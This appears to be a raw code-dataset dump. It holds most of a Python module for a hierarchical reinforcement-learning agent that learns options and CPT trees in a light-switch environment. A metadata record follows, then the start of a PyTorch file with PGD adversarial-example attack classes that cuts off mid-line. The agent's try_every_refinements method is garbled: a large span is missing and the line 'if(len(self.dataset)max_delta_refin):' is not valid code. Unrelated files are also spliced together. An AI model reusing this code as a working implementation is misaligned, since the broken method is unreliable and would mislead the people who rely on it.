self.FMDP[act][\"cpts\"][var]\n self.FMDP[act][\"cpts\"][var].var=var\n \n \n #Actions\n self.actions = dict()\n for act in range(1, env.get_nb_light()+1):\n self.actions[act]=self.Action(act, self.env)\n \n #\n self.action_to_set = dict()\n \n #Options\n self.options = dict()\n \n #For each option, a list (or tree?) of skills called by the option\n self.options_hierarchies = dict() \n \n #current state of the env\n self.state_t = env.get_state()\n \n #current option\n self.current_option = None\n \n #current plan\n self.current_plan=None\n \n #pointer on current option in plan\n self.plan_ptr=-1\n \n #iteration\n self.t = 1\n \n #Controllable set\n self.C = set()\n \n #waiting to get in C\n self.queue_for_C = set()\n \n #M step max in an option\n self.M = M\n \n #N execution before considering removing a refinement\n self.N = N\n \n #K minimum nb of datapoint to condider a refinement\n self.K = K\n \n #epsilon : exploration parameter in action selectino\n self.epsilon = epsilon\n \n #To be removed later, artificially associate lights to actions\n self.artificial_setup()\n \n #Inde treshold for chi square TODO pass as parameter\n self.inde_treshold = 0.995\n \n #self.artificial_setup()\n \n self.refin = set()\n\n self.timing = False\n \n self.start_time = None\n \n self.print_entropies = False\n \n #if not None, the agent will write the evolution of refinement in a file\n self.experiment_id = experiment_id\n \n #path to the data directory\n self.data_path=data_path\n \n if(not self.experiment_id == None):\n if(path.exists(self.data_path+self.experiment_id+\"/\"+self.type)):\n print(\"Experiment already exists ! No folder created, this agent will crash ! \\nYou must change the experiment_id.\")\n else:\n os.makedirs(self.data_path+self.experiment_id+\"/\"+self.type)\n self.my_dir = self.data_path+self.experiment_id+\"/\"+self.type\n self.iter_array = np.array([0], dtype=np.int64)\n self.time_array = np.array([0])\n self.refin_array = np.array([0], dtype=np.int64)\n \n self.writting_period = 200\n \n #used to give basicaction of first level to the agent, temporarly\n def artificial_setup(self):\n for i in range(1, self.env.get_nb_light()+1):\n self.action_to_set[i]=self.actions[i]\n for i in range(1, self.env.light_by_lvl[0]+1):\n self.C.add(i)\n \n #string description\n def __str__(self):\n return(\"{} agent, currently at iteration {} and learned {} options\".format(self.type, self.t, len(self.options)))\n \n #launch the agent\n def start(self):\n if(self.start_time==None):\n self.start_time = time.time()\n while(not self.stop_condition()):\n self.behaviour()\n \n #condition to stop the agent\n def stop_condition(self):\n #temporary, for tests\n maxit = 20000\n update_freq = 1\n perc=self.t/maxit*100\n if((perc-np.floor(perc))==0 and np.floor(perc)%update_freq==0):\n #print(\"=========================================================\")\n print(\"{}% - {} correct refinements \\t \".format(perc, self.count_correct_refinements()))\n if(self.timing):\n d=time.time()-self.start_time\n h = d//3600\n r=d%3600\n m = r//60\n s=r%60\n print(\"Running for {} hours, {} minutes, {} seconds\".format(h,m,s))\n #print(\"=========================================================\")\n if(self.t>maxit):\n return True\n #maybe changed\n return False\n \n \n \n #bahaviour af the agent, the main loop\n def behaviour(self):\n act = self.selectAction( self.state_t)\n act.execute()\n state_t1 = self.env.get_state()\n self.update(self.state_t, act, state_t1)\n self.state_t = state_t1\n self.t+=1\n if(self.t%self.writting_period==0):\n self.write_data()\n \n #Action selection, different for each type of agent\n def selectAction(self, state):\n #print(\"Not implemented in abstract\")\n #return(self.actions[np.random.randint(20)+1])\n if(np.random.rand()<0.9):\n return(self.actions[np.random.randint(9)+1])\n return(self.actions[np.random.randint(6)+10])\n\n #Update the FMDP\n def update(self, state_t, act, state_t1):\n if(isinstance(act,int)):\n act = self.actions[act]\n current_DBN = self.FMDP[act.light_id]\n for ind in current_DBN[\"cpts\"]:\n #print(\"add point in DBN {}, CPT{}\".format(act, ind))\n leaf = current_DBN[\"cpts\"][ind].add_datapoint(state_t, act, state_t1)\n leaf.compute_BIC_Mono()\n leaf.try_every_refinements()\n current_DBN[\"cpts\"][ind].check_refinements(state_t)\n \n #Return solution to set the var to 1 : an option if exists, an action if not\n def get_solution(self, var, target_value):\n #print(\"solution for {} asked\".format(var))\n #print(\"Implement get solution\")\n if(target_value==0):\n return self.action_to_set[var]\n if(var in self.C):\n if((var, target_value) in self.options):\n return self.options[(var, target_value)]\n if(var in self.action_to_set):\n return self.action_to_set[var]\n print(self.action_to_set)\n print(\"No soultion for {}\".format(var))\n return(-1)\n \n #Return Action to set the var to 1 : an option if exists, an action if not\n def get_action(self, var):\n #print(\"solution for {} asked\".format(var))\n #print(\"Implement get solution\")\n if(var in self.action_to_set):\n return self.action_to_set[var]\n print(\"No action for {}\".format(var))\n return(-1)\n \n def try_option(self, var,target_value, parents, sig_0, opt_root):\n if ((var, target_value) in self.options):\n if self.options[(var, target_value)].sig_0 > sig_0:\n return False\n self.options[(var, target_value)].opt_root.used=False\n self.remove(var, target_value)\n o=self.create_option(var,target_value, parents, sig_0, opt_root)\n #print(\"Create: \")\n #o.print_tree()\n #o.opt_root.parent.print_tree()\n opt_root.used = True\n return True\n \n \n def create_option(self, var, target_value, parents, sig_0, opt_root):\n \n o = self.Option(self, var, target_value, parents, sig_0, opt_root)\n #check if controllable, add to C or queue_for_C accordingly\n if self.is_controllable(o.variable):\n #TODO Check if an option wait for me to be controllable\n self.C.add(o.variable)\n self.check_update_C()\n \n else:\n self.queue_for_C.add(o.variable) \n return o\n \n #add a refinement in the set\n def add_refin(self, tree_var, refin_var):\n self.refin.add((tree_var, refin_var))\n \n def remove_refin(self, tree_var, refin_var):\n if((tree_var, refin_var) in self.refin):\n self.refin.remove((tree_var, refin_var))\n \n def count_correct_refinements(self):\n n_ref=0\n for r in self.env.refin:\n if r in self.refin:\n n_ref +=1\n return n_ref\n\n \n def remove(self, var, target_value):\n self.options[(var, target_value)].opt_root.used=False\n #if((var, target_value) in self.options):\n #print(\"remove : \")\n #self.options[(var, target_value)].print_tree()\n if(not (var, target_value) in self.options):\n print(\"No option for {} to remove\".format((var, target_value)))\n removed_o = self.options.pop((var, target_value), None)\n \n #remove option from other options hierarchie \n for node in LevelOrderIter(removed_o.root):\n if(isinstance(node.solution, AbstractAgent.Option)):\n #print(\"In remove {} -> {} \\nTry to remove O{} [{}] of O{} [{}] hierarchie \".format(var,target_value, removed_o.variable,hex(id(removed_o)), node.solution.variable, hex(id(node.solution))))\n \n self.options_hierarchies[node.solution].remove(removed_o)\n \n #iterating over hierarchy even if it changes size\n tmp_hierarchy_set = self.options_hierarchies[removed_o].copy()\n for calling_opt in tmp_hierarchy_set:\n if(calling_opt in self.options_hierarchies[removed_o]):\n self.remove(calling_opt.variable, calling_opt.target_value)\n \n self.options_hierarchies.pop(removed_o,None)\n if(var in self.C):\n self.C.remove(var)\n if(var in self.queue_for_C):\n self.queue_for_C.remove(var)\n \n #To handle always controllable var, should be removed later\n if(self.is_controllable(var)):\n self.C.add(var)\n\n #remove an option and check if an other one can replace it\n def remove_and_recreate_option(self, var, target_value):\n \n self.remove(var, target_value)\n \n for key in self.FMDP:\n bn=self.FMDP[key]\n root = bn[\"cpts\"][var].children[1-target_value]\n tree=root\n if not tree.is_leaf():\n opt_parents = []\n while(not tree.is_leaf()):\n opt_parents.append(tree.var)\n tree=tree.children[target_value]\n \n sig=0\n for d in tree.dataset:\n if d[\"s_1\"][var] == target_value :\n sig+=1\n sig = sig/len(tree.dataset)\n self.try_option(var, target_value, opt_parents, sig, root)\n \n \n def set_running_option(self, option):\n self.current_option = option\n \n def is_controllable(self, var):\n #should be removed later\n if var in range(self.env.light_by_lvl[0]+1):\n return True\n \n #if(not (var, 0) in self.options):\n # return False\n #O_off = self.options[(var, 0)]\n \n if(not (var, 1) in self.options):\n return False\n O_on = self.options[(var, 1)]\n \n for p in O_on.parents:\n if p not in self.C:\n return False\n \n #for p in O_off.parents:\n # if p not in self.C:\n # return False\n return True\n \n \n #Check if a waiting var can be add to C \n def check_update_C(self):\n updated = True\n while(updated == True):\n updated=False\n to_remove = []\n for var in self.queue_for_C:\n if(self.is_controllable(var)):\n to_remove.append(var)\n self.C.add(var)\n updated=True\n \n for var in to_remove:\n self.queue_for_C.remove(var)\n \n def write_data(self):\n if(self.experiment_id == None):\n print(\"No experiment\")\n return\n self.iter_array=np.append(self.iter_array, self.t)\n self.refin_array=np.append(self.refin_array, self.count_correct_refinements())\n self.time_array=np.append(self.time_array, time.time()-self.start_time)\n \n np.savetxt(self.my_dir+\"/iterations\", self.iter_array)\n np.savetxt(self.my_dir+\"/refinements\", self.refin_array)\n np.savetxt(self.my_dir+\"/time\", self.time_array)\n \n \n#--------INTERNAL CLASSES------------------\n \n#==========================================================================================================\n#===================================== ACTION, internal class==============================================\n#==========================================================================================================\n\n class Action():\n \n #constructor\n def __init__(self, light_id, env):\n self.light_id = light_id\n self.env = env\n \n #string description\n def __str__(self):\n return(\"A{}\".format(self.light_id))\n \n #execution\n def execute(self):\n self.env.turn_on(self.light_id)\n \n def is_action(self):\n return True\n \n\n\n#==========================================================================================================\n#====================================== OPTION, internal class ============================================\n#==========================================================================================================\n\n\n class Option():\n \n #Constructor : variable associated, sigma_0, list of parent variables\n def __init__(self, my_agent, variable, target_value, parents, sig_0, opt_root):\n #agent\n self.my_agent = my_agent\n #variable on which the option should have an effect\n self.variable = variable\n #value in which the variable is supposed to be set after the option execution\n self.target_value = target_value\n #parents\n self.parents = parents\n #sigma and sigma_0\n self.sig_0 = sig_0\n self.sig = sig_0\n #nb of execution, used to update sigma\n self.nb_exec=0\n #step of the current execution\n self.step = 0\n #used when called as a nested option\n self.previous_option = None\n #True after terminal action\n self.done = False\n \n self.opt_root = opt_root\n \n previousNode = None\n options_called=[]\n #for each parent\n for i in range(len(parents)):\n #create a Node\n node = self.OptionTreeNode(parents[i], 1)\n #set the 0 child\n tmp_solution = my_agent.get_solution(parents[i], target_value)\n if(isinstance(tmp_solution, AbstractAgent.Option)):\n #if(tmp_solution.check_if_call(self, [])):#wtf\n \n #tmp_solution = get_action(self.variable)\n #else:\n my_agent.options_hierarchies[tmp_solution].add(self)\n if(target_value == 1):\n child_0 = self.OptionTreeNode(-1, 0, solution = tmp_solution)\n child_0.parent = node\n else:\n child_1 = self.OptionTreeNode(-1, 1, solution = tmp_solution)\n #if solution is option, add to option called\n #print(tmp_solution)\n if(not tmp_solution.is_action):\n options_called.append(tmp_solution)\n #check if root\n if(i==0):\n self.root=node\n node.child_01 = None\n #if not, link to the parent\n else:\n node.parent=previousNode\n #if last, set the 1 child\n if(i==len(parents)-1):\n tmp_solution = my_agent.get_action(self.variable)\n if(target_value == 1):\n child_1 = self.OptionTreeNode(-1, 1, tmp_solution, is_terminal=True)\n child_1.parent=node\n else:\n child_0 = self.OptionTreeNode(-1, 0, tmp_solution, is_terminal=True)\n child_0.parent=node\n #if solution is option, add to option called\n if(not tmp_solution.is_action):\n options_called.append(tmp_solution)\n if(target_value == 0):\n child_1.parent = node\n previousNode = node\n \n #Will probably be removed \n self.exec_pointer = self.root\n self.my_agent.options[(self.variable, target_value)] = self\n \n \n \n #register myself as caller of nested options \n for o in options_called:\n self.my_agent.options_hierarchies[o].append(self)\n #init my own caller list \n self.my_agent.options_hierarchies[self]=set()\n \n def __str__(self):\n val=\"Off\"\n if(self.target_value == 1):\n val = \"On\"\n return(\"O{} -> {}\".format(self.variable, val))\n \n def next_step(self, state):\n next_move = self.root\n self.step+=1\n #go down in the tree according to the state until the node contain an action or an option\n while(next_move.solution==None):\n var = next_move.var\n if(state[var-1]):\n next_move=next_move.children[1]\n else:\n next_move=next_move.children[0]\n \n #find an action, return it \n if(next_move.solution.is_action()):\n if(next_move.is_terminal):\n self.done = True\n return(next_move.solution)\n #find an option \n else:\n #set the nested option as current one and return the first action\n next_move.solution.reset()\n next_move.solution.set_previous(self)\n self.my_agent.set_running_option(next_move.solution)\n return(next_move.solution.next_step(state))\n \n #update sig and go back to the previous option if needed \n def update_sig(self, delta):\n self.nb_exec+=1\n self.sig=self.sig+((delta-self.sig)/self.nb_exec)\n if(not (self.previous_option==None)):\n self.my_agent.set_running_option(self.previous_option)\n self.previous_option = None\n\n #Check if this option call opt\n def check_if_call(self, opt, visited):\n if(self in self.my_agent.options_hierarchies[opt]):\n return True\n new_visited = visited + [self]\n for node in LevelOrderIter(self.root):\n if(isinstance(node.solution, AbstractAgent.Option) and not (node.solution in visited)):\n if(node.solution.check_if_call(opt, new_visited)):\n return True\n return False\n \n #when called as nested option, stock the calling option in previous\n def set_previous(self, previous_option):\n self.previous_option = previous_option\n \n #reset before a new execution\n def reset(self):\n self.step = 0\n self.exec_pointer = self.root\n self.done=False\n \n #amazing display\n def print_tree(self):\n val=\"Off\"\n if(self.target_value == 1):\n val = \"On\"\n print(\"O{} -> {}\".format(self.variable, val))\n self.root.print_tree() \n \n #used to check if a node contain an option or an action\n def is_action(self):\n return False\n \n #Internal class for nodes of the policy tree of the option\n class OptionTreeNode(NodeMixin):\n #Constructor : var of the split (-1 if option/action node), child_01 = 0 or 1, solution = action/option if needed, is_terminal = True for the terminal action node \n def __init__(self, var, child_01, solution=None, is_terminal=False):\n self.var = var\n self.solution = solution\n self.child_01 = child_01\n self.is_terminal = is_terminal\n \n #another amazing display \n def print_tree(self):\n for pre, _, node in RenderTree(self):\n treestr = u\"%s%s\" % (pre, node.var)\n if(node.is_root):\n treestr = u\"%s%s\" % (pre,node.var)\n print(treestr.ljust(8))\n else:\n if(node.var == -1):\n #change when real solution\n treestr = u\"%s%s\" % (pre, \"{} [{}]\".format(node.solution,node.child_01))\n else: \n treestr = u\"%s%s\" % (pre, \"{} [{}]\".format(node.var,node.child_01))\n print(treestr.ljust(8))\n\n \n \n \n#==========================================================================================================\n#======================================= CPT NODES, internal class ========================================\n#==========================================================================================================\n\n\n\n class CPTNode(NodeMixin):\n \n #constructor\n def __init__(self, DBN, tree_var, my_agent, parents_list = None, dataset = None, child_01= None):\n self.name=\"X\"\n self.tree_var = tree_var\n self.DBN = DBN\n self.my_agent = my_agent\n self.var = -1\n self.BIC = 0\n self.used=False\n if(dataset == None):\n self.dataset = []\n else:\n self.dataset = dataset\n self.leaf_distrib = 0\n if(len(self.dataset)>0):\n for d in self.dataset:\n if(d[\"s_1\"][self.tree_var-1]==1):\n self.leaf_distrib+=1\n self.leaf_distrib = self.leaf_distrib / (len(self.dataset))\n \n if(parents_list == None):\n self.parents_list = []\n else:\n self.parents_list = parents_list \n self.child_01=child_01\n self.nb_var = my_agent.env.get_nb_light()\n #\n self.distrib_vect = dict() \n for i in range(1, self.nb_var+1):\n if not i in self.parents_list:\n self.distrib_vect[i] =[0,0]\n \n #print(\"TODO CPT node\")\n \n #string description\n def __str__(self):\n return(\" leaf : {}, datapoints : {}, distrib_vect {}\".format(self.is_leaf(), len(self.dataset), self.distrib_vect))\n \n def print_tree(self):\n for pre, _, node in RenderTree(self):\n #treestr = u\"%s%s\" % (pre, node.var)$\n if(node.is_root and node.is_leaf()):\n treestr = u\"%s%s\" % (pre, \"{} {}\".format(node.var,node.leaf_distrib))\n print(treestr.ljust(8))\n elif(node.is_root):\n treestr = u\"%s%s\" % (pre, node.var)\n print(treestr.ljust(8))\n elif(node.is_leaf()):\n treestr = u\"%s%s\" % (pre, \"-{}-> {}\".format(node.child_01,node.leaf_distrib))\n print(treestr.ljust(8))\n \n else:\n treestr = u\"%s%s\" % (pre, \"-{}-> {}\".format(node.child_01,node.var))\n print(treestr.ljust(8))\n\n \n def is_leaf(self):\n return(len(self.children)==0)\n \n #return the leaf where the point has been added \n def add_datapoint(self, s_0, act, s_1):\n val_on_s_0 = s_0[self.var-1]\n\n \n #if leaf, add to dataset and updat distrib_vect \n if(self.is_leaf()):\n self.leaf_distrib = (self.leaf_distrib*len(self.dataset) + s_1[self.tree_var-1]) / (len(self.dataset) + 1)\n self.dataset.append({\"s_0\" : s_0, \"a\" : act, \"s_1\" : s_1}) \n for j in self.distrib_vect:\n j_val = 0\n if s_0[j-1]:\n j_val=1\n \n self.distrib_vect[j][j_val]+=1\n return(self)\n \n #if not leaf\n else:\n if(val_on_s_0==False):\n return(self.children[0].add_datapoint( s_0, act, s_1))\n else:\n return(self.children[1].add_datapoint( s_0, act, s_1))\n \n #recreate distribution vectore, used on splits and prunes\n def recalculate_distrib_vect(self):\n self.distrib_vect = dict() \n for i in range(1, self.nb_var+1):\n if not i in self.parents_list:\n self.distrib_vect[i] =[0,0]\n for i in range(1, self.nb_var+1):\n if not i in self.parents_list:\n for d in self.dataset:\n i_val = 0\n if d[\"s_0\"][i-1]:\n i_val=1\n self.distrib_vect[i][i_val]+=1\n \n #Shannon's entropy over a distribution vector \n def shannon(self, vect):\n #tot = 0\n #h = 0\n \n #for x in vect:\n # tot+=x\n #for x in vect:\n # if(x>0):\n # h-= (x/tot) * np.log(x/tot)\n #return h\n h = entropy(vect, base=2 )\n #if(math.isnan(h)):\n # h=0\n return(h)\n \n def entropy(self):\n h=0\n for v in self.distrib_vect:\n h+=self.shannon(self.distrib_vect[v])\n return h\n \n #calculate entropy gain in this node if the action is executed in the given state and\n #the datapoint goes in this dataset\n def entropy_gain_old(self, state):\n h0 = self.entropy()\n \n h1=0\n for v in self.distrib_vect:\n tmp_v = self.distrib_vect[v].copy()\n if(state[v-1]==True):\n tmp_v[1]+=1\n else:\n tmp_v[0]+=1\n h1+=self.shannon(tmp_v)\n return h1 - h0 \n \n def entropy_gain(self, state):\n max_G = -1\n for v in self.distrib_vect:\n tmp_v = self.distrib_vect[v].copy()\n if(state[v-1]==True):\n tmp_v[1]+=1\n else:\n tmp_v[0]+=1\n G = self.shannon(tmp_v) - self.shannon(self.distrib_vect[v])\n if(math.isnan(G) or G>max_G):\n max_G=G\n return max_G\n \n \n #go down in the tree to find the dataset in which state goes and return the entropie gain\n def tree_entropy_gain(self, state):\n val_on_s_0 = state[self.var-1]\n\n \n #if leaf, return gain \n if(self.is_leaf()):\n return(self.entropy_gain(state))\n \n #if not leaf\n else:\n if(val_on_s_0==False):\n return(self.children[0].tree_entropy_gain(state))\n else:\n return(self.children[1].tree_entropy_gain(state))\n \n \n #BIC computation \n def compute_BIC_not_used(self):\n if(len(self.dataset)==0):\n return 0\n \n #Likelihood\n L=0\n #create N_ijk\n N=[]\n for i in range(1, self.nb_var+1):\n N.append(dict())\n #fill N_ijk\n for d in self.dataset:\n s_0 = d[\"s_0\"]\n s_1 = d[\"s_1\"]\n for i in range(1, self.nb_var+1):\n #get parents(i) state\n j_state_0=\"\"\n for j in self.DBN[\"parents\"][i]:\n if(s_0[j-1]==False):\n j_state_0+=\"0\"\n else:\n j_state_0+=\"1\"\n #get k\n k=0\n if(s_1[i-1]==True):\n k=1 \n #check presence of the j key \n if not j_state_0 in N[i-1]:\n N[i-1][j_state_0]=[0,0]\n #increment \n N[i-1][j_state_0][k]+=1\n \n #get the sum\n for i in range(1, self.nb_var+1):\n for j in N[i-1]:\n #get both N_ijk values\n N_ij0 = N[i-1][j][0]\n N_ij1 = N[i-1][j][1]\n #teta_ijk = N_ijk/sum_on_k(N_ijk) : probability estimated bu counting\n teta_ij0 = N_ij0/(N_ij0+N_ij1)\n teta_ij1 = N_ij1/(N_ij0+N_ij1)\n #Add to L in tetas are not 0\n if(teta_ij0>0 and teta_ij1 >0):\n #print(\"i = {} j = {} - >\\n\\tk = 0 Nijk = {} teta = {}\\n\\tk = 1 Nijk = {} teta = {}\\n\\tincrement L of {}\".format(i, j, N_ij0, teta_ij0, N_ij1, teta_ij1, N_ij0 * np.log(teta_ij0) + N_ij1 * np.log(teta_ij1)))\n L+= (N_ij0 * np.log(teta_ij0) + N_ij1 * np.log(teta_ij1))\n \n #finally compute BIC \n BIC = L - ((self.nb_var)/2 * np.log(len(self.dataset)))\n self.BIC = BIC\n return BIC\n \n #BIC Whithout sum on i\n def compute_BIC_Mono(self):\n if(len(self.dataset)==0):\n return 0\n #Likelihood\n L=0\n #create N_ijk\n N=dict()\n i=self.tree_var\n \n #fill N_ijk\n for d in self.dataset:\n s_0 = d[\"s_0\"]\n s_1 = d[\"s_1\"]\n #get parents(i) state\n j_state_0=\"\"\n #for j in self.DBN[\"parents\"][i]:\n for j in self.parents_list:\n if(s_0[j-1]==False):\n j_state_0+=\"0\"\n else:\n j_state_0+=\"1\"\n #get k\n k=0\n if(s_1[i-1]==True):\n k=1 \n #check presence of the j key \n if not j_state_0 in N:\n N[j_state_0]=[0,0]\n #increment \n N[j_state_0][k]+=1\n \n #get the sum\n for j in N:\n #get both N_ijk values\n N_ij0 = N[j][0]\n N_ij1 = N[j][1]\n #teta_ijk = N_ijk/sum_on_k(N_ijk) : probability estimated bu counting\n teta_ij0 = N_ij0/(N_ij0+N_ij1)\n teta_ij1 = N_ij1/(N_ij0+N_ij1)\n #Add to L in tetas are not 0\n if(teta_ij0>0 and teta_ij1 >0):\n #print(\"i = {} j = {} - >\\n\\tk = 0 Nijk = {} teta = {}\\n\\tk = 1 Nijk = {} teta = {}\\n\\tincrement L of {}\".format(i, j, N_ij0, teta_ij0, N_ij1, teta_ij1, N_ij0 * np.log(teta_ij0) + N_ij1 * np.log(teta_ij1)))\n L+= (N_ij0 * np.log(teta_ij0) + N_ij1 * np.log(teta_ij1))\n #print(L) \n #finally compute BIC \n BIC = L - ((self.nb_var)/2 * np.log(len(self.dataset)))\n self.BIC = BIC\n return BIC\n \n def try_every_refinements(self):\n if(len(self.dataset)max_delta_refin):\n max_refin = tmp_refin\n max_delta_refin = tmp_refin[2]\n #create refin\n (_, var, delta, child_0, child_1) = max_refin\n child_0.parent = self\n child_1.parent = self\n #to set tree var to the other value\n target_var = 1 - self.dataset[0][\"s_0\"][self.tree_var-1]\n self.var=var\n self.dataset=[]\n children_parents = self.parents_list + [var] \n #TODO Sigma estimation\n sig=0\n for d in self.children[target_var].dataset:\n if d[\"s_1\"][self.tree_var-1] == target_var :\n sig+=1\n sig = sig/len(child_1.dataset)\n opt_parents = children_parents.copy()\n opt_parents.remove(self.tree_var)\n #print(\"var : {}, delta : {}\".format(var, delta))\n #self.DBN[\"cpts\"][self.tree_var].print_tree()\n child_0.recalculate_distrib_vect()\n child_1.recalculate_distrib_vect()\n #create a refinment in the agent \"correct refinement set\" only if target_var = 1 and DBN[\"var\"] = tree_var\n if(self.DBN[\"action\"] == self.tree_var and target_var == 1):\n self.my_agent.add_refin(self.tree_var, var)\n self.my_agent.try_option(self.tree_var, target_var, opt_parents, sig, self.DBN[\"cpts\"][self.tree_var].children[1-target_var])\n \n #return a tuple (bool, var, delta, child_0, child_1)\n def try_refinement(self, var):\n #split dataset on the refinement var\n dataset_0 = []\n dataset_1 = []\n for d in self.dataset:\n if(d[\"s_0\"][var-1]==0):\n dataset_0.append(d)\n else:\n dataset_1.append(d)\n #avoid size 1 dataset because the BIC is 0 (log(1) = 0) and refine every time\n if(len(dataset_0) == 1 or len(dataset_1)==1):\n return (False, None, None, None ,None)\n children_parents = self.parents_list + [var] \n child_0 = type(self)(self.DBN,self.tree_var, self.my_agent, parents_list = children_parents, dataset =dataset_0, child_01 = 0) \n child_1 = type(self)(self.DBN, self.tree_var, self.my_agent, parents_list = children_parents, dataset =dataset_1, child_01 = 1)\n #if children BICs are better\n BIC0 = child_0.compute_BIC_Mono()\n BIC1 = child_1.compute_BIC_Mono()\n if(BIC0 + BIC1 > self.compute_BIC_Mono()):\n #print(\"BIC0 = {}, BIC1 = {}, my BIC = {}, var = {}, tree_var = {}\".format(BIC0, BIC1, self.compute_BIC_Mono(),var, self.tree_var))\n #if(False):\n # print(\"Dataset parent\")\n # tmpind = 0\n # for d in self.dataset:\n # tmpind += 1\n # print(\"{} : {} ; {}\".format(tmpind,d[\"s_0\"],d[\"s_1\"]))\n # tmpind = 0\n # print(\"Dataset child0\")\n # for d in child_0.dataset:\n # tmpind += 1\n # print(\"{} : {} ; {}\".format(tmpind,d[\"s_0\"],d[\"s_1\"]))\n # tmpind = 0\n ## print(\"Dataset child1\")\n # for d in child_1.dataset:\n # tmpind += 1\n # print(\"{} : {} ; {}\".format(tmpind,d[\"s_0\"],d[\"s_1\"]))\n return (True, var, BIC0+BIC1-self.BIC, child_0, child_1)\n #no refinement\n return (False, None, None, None ,None)\n \n #return true if the var of the node is independent from the tree var => refinement not consistent \n def chi_2(self):\n refined_var = self.var\n desc_dataset = []\n for desc in self.descendants:\n desc_dataset = desc_dataset + desc.dataset\n n_tot=len(desc_dataset)\n if(n_tot==0):\n return False\n #n_ij\n n=[[0,0],[0,0]]\n \n for d in desc_dataset:\n i=d[\"s_0\"][refined_var-1]\n j=d[\"s_1\"][self.tree_var-1]\n n[i][j]+=1\n if((n[0][0]==0 or n[1][1]==0) and (n[0][1]==0 or n[1][0]==0)):\n return True\n chi2 = chi2_contingency(n)\n independency = chi2[1] > (1-self.my_agent.inde_treshold)\n #if(independency):\n #print(chi2)\n return(independency)\n \n def prune(self):\n desc_dataset=[]\n tmp_node = self\n tmp_prec_node = None\n target_value = 0\n while(not tmp_node.parent == None):\n tmp_prec_node = tmp_node\n tmp_node = tmp_node.parent\n #print(\"tmp_prec_node : {}\".format(tmp_prec_node))\n #print(\"tmp_node.children[1] : {}\".format(tmp_node.children[1]))\n if(tmp_node.children[0]==tmp_prec_node):\n target_value = 1\n\n \n for desc in self.descendants:\n desc_dataset = desc_dataset + desc.dataset\n \n #remove refin from refin set in agent\n #if(target_value==1):\n #print(target_value)\n if(desc.DBN[\"action\"] == desc.tree_var and target_value == 1):\n #print(\"Remove ref ({},{})\".format(desc.tree_var, desc.var))\n self.my_agent.remove_refin(desc.tree_var, desc.var)\n #just to be sure\n del desc\n \n self.dataset=desc_dataset\n if(len(self.dataset)>0):\n for d in self.dataset:\n if(d[\"s_1\"][self.tree_var-1]==1):\n self.leaf_distrib+=1\n self.leaf_distrib = self.leaf_distrib / (len(self.dataset))\n self.children=[]\n self.recalculate_distrib_vect()\n \n def check_refinements(self, s_0):\n val_on_s_0 = s_0[self.var-1] \n #if leaf, no refinment \n if(self.is_leaf()):\n return False\n \n elif(( self.var != self.tree_var ) and self.chi_2()):\n #print(\"Prune on DBN : {}, CPT : {}, Node of var : {}\".format(self.DBN, self.tree_var, self.var))\n \n tmp_target = 1-s_0[self.tree_var-1]\n opt_root = self.DBN[\"cpts\"][self.tree_var].children[1-tmp_target]\n #print(\"Prune on : {} in : \".format(self.var))\n #opt_root.parent.print_tree()\n #opt_root.print_tree()\n #print(opt_root.used)\n self.prune()\n \n if opt_root.used:\n self.my_agent.remove_and_recreate_option(self.tree_var, tmp_target)\n return True\n #TODO Option and things\n \n #if not leaf\n else:\n if(val_on_s_0==False):\n return(self.children[0].check_refinements( s_0))\n else:\n return(self.children[1].check_refinements( s_0))","sub_path":"src/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":41513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"622999009","text":"import torch\r\nimport os\r\nimport torch.optim as optim\r\n\r\n\r\nclass Attack():\r\n def __init__(self, model, eps, alpha, iters, norm, criterion, device):\r\n self.model = model.eval()\r\n self.eps = eps\r\n self.iters = iters\r\n self.norm = norm\r\n self.device = device\r\n self.alpha = alpha\r\n self.criterion = criterion\r\n\r\n\r\nclass PGD(Attack):\r\n def __call__(self, images, labels, randinit=False, inverse=1):\r\n images = images.to(self.device).detach().clone()\r\n labels = labels.to(self.device).detach().clone()\r\n ori_images = images.detach().clone()\r\n\r\n if ((randinit) and (self.norm == 10) and (self.iters > 0)):\r\n images += (torch.rand_like(images) - .5) * self.eps * 2\r\n images = torch.clamp(images, min=0, max=1)\r\n if ((randinit) and (self.norm < 10) and (self.iters > 0)):\r\n images += torch.randn_like(images) * 0.001\r\n images = torch.clamp(images, min=0, max=1)\r\n\r\n for i in range(self.iters):\r\n images.requires_grad = True\r\n outputs = self.model(images)\r\n self.model.zero_grad()\r\n loss = self.criterion(outputs, labels) * inverse\r\n loss.backward()\r\n #print(loss)\r\n with torch.no_grad():\r\n if self.norm == 10:\r\n adv_images = images + self.alpha * images.grad.sign()\r\n eta = torch.clamp(adv_images - ori_images,\r\n min=-self.eps,\r\n max=self.eps)\r\n images = torch.clamp(ori_images + eta, min=0,\r\n max=1).detach_()\r\n else:\r\n adv_images = images + self.alpha * images.grad / images.grad.view(\r\n images.shape[0], -1).norm(self.norm, dim=1).view(\r\n -1, 1, 1, 1)\r\n eta = adv_images - ori_images\r\n mask = eta.view(eta.shape[0], -1).norm(self.norm,\r\n dim=1) <= self.eps\r\n scale = eta.view(eta.shape[0], -1).norm(self.norm, dim=1)\r\n scale[mask] = self.eps\r\n eta *= self.eps / scale.view(-1, 1, 1, 1)\r\n images = torch.clamp(ori_images + eta, min=0,\r\n max=1).detach_()\r\n adv_images = images\r\n return adv_images\r\n\r\n\r\nclass PGDadam(Attack):\r\n def __call__(self, images, labels, randinit=False, inverse=1):\r\n images = images.to(self.device).detach().clone()\r\n labels = labels.to(self.device).detach().clone()\r\n ori_images = images.detach().clone()\r\n\r\n if ((randinit) and (self.norm == 10) and (self.iters > 0)):\r\n images += (torch.rand_like(images) - .5) * self.eps * 2\r\n images = torch.clamp(images, min=0, max=1)\r\n if ((randinit) and (self.norm < 10) and (self.iters > 0)):\r\n images += torch.randn_like(images) * 0.001\r\n images = torch.clamp(images, min=0, max=1)\r\n\r\n images.requires_grad = True\r\n optimizer = optim.Adam([images], lr=self.alpha)\r\n for i in range(self.iters):\r\n optimizer.zero_grad()\r\n outputs = self.model(images)\r\n loss = (-1) * self.criterion(outputs, labels) * inverse\r\n #print(loss)\r\n loss.backward()\r\n optimizer.step()\r\n with torch.no_grad():\r\n if self.norm == 10:\r\n eta = torch.clamp(images.detach().clone() - ori_images,\r\n min=-self.eps,\r\n max=self.eps)\r\n images.data = torch.clamp(ori_images + eta, min=0, max=1)\r\n else:\r\n eta = images.detach().clone() - ori_images\r\n mask = eta.view(eta.shape[0], -1).norm(self.norm,\r\n dim=1) <= self.eps\r\n scale = eta.view(eta.shape[0], -1).norm(self.norm, 